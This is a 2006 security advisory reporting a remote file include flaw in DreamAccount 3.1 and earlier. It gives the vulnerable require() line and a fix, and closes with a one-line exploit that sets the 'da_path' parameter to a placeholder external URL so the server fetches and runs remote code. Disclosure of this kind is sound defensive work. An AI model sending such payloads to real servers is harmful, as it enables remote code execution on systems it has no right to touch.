[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability=0D
-------------------------------------------------------------------------=0D
=0D
Software: DreamAccount=0D
=0D
Version: <=3.1=0D
=0D
Type: Remote File Include Vulnerability=0D
=0D
Date: June, 3rd 2006=0D
=0D
Vendor: dreamcost  =0D
=0D
Page: http://dreamcost.com=0D 
=0D
Risc: High=0D
=0D
Credits:=0D
----------------------------=0D
=0D
Discovered by: David 'Aesthetico' Vieira-Kurz=0D
http://www.majorsecurity.de=0D 
=0D
Original Advisory:=0D
----------------------------=0D
http://www.majorsecurity.de/advisory/major_rls8.txt=0D 
=0D
Affected Products:=0D
----------------------------=0D
=0D
DreamAccount 3.1 and prior=0D
=0D
Description:=0D
----------------------------=0D
=0D
DreamAccount is a membership and subscription software application that is both simple to use and install, =0D
while remaining affordable enough for even the smallest startup.=0D
=0D
Requirements:=0D
----------------------------=0D
=0D
register_globals = On=0D
=0D
Vulnerability:=0D
----------------------------=0D
=0D
Input passed to the "da_path" parameter in "auth.cookie.inc.php" is not=0D
properly verified, before it is used to include files.=0D
This can be exploited to execute arbitrary code by including files from external resources.=0D
=0D
Solution:=0D
----------------------------=0D
=0D
I think you can fix this bug by replacing the following vulnerable code in the =0D
"auth.cookie.inc.php" with my one. It should fix the vulnerabilty and solve this=0D
problem.=0D
=0D
Vulnerable one:   "require($da_path . "setup.php");"=0D
MajorSecurity fix: "require("setup.php");"=0D
=0D
Set "register_globals" to "Off".=0D
=0D
Exploitation:=0D
----------------------------=0D
=0D
Post data:=0D
=0D
da_path=http://www.yourspace.com/yourscript.php?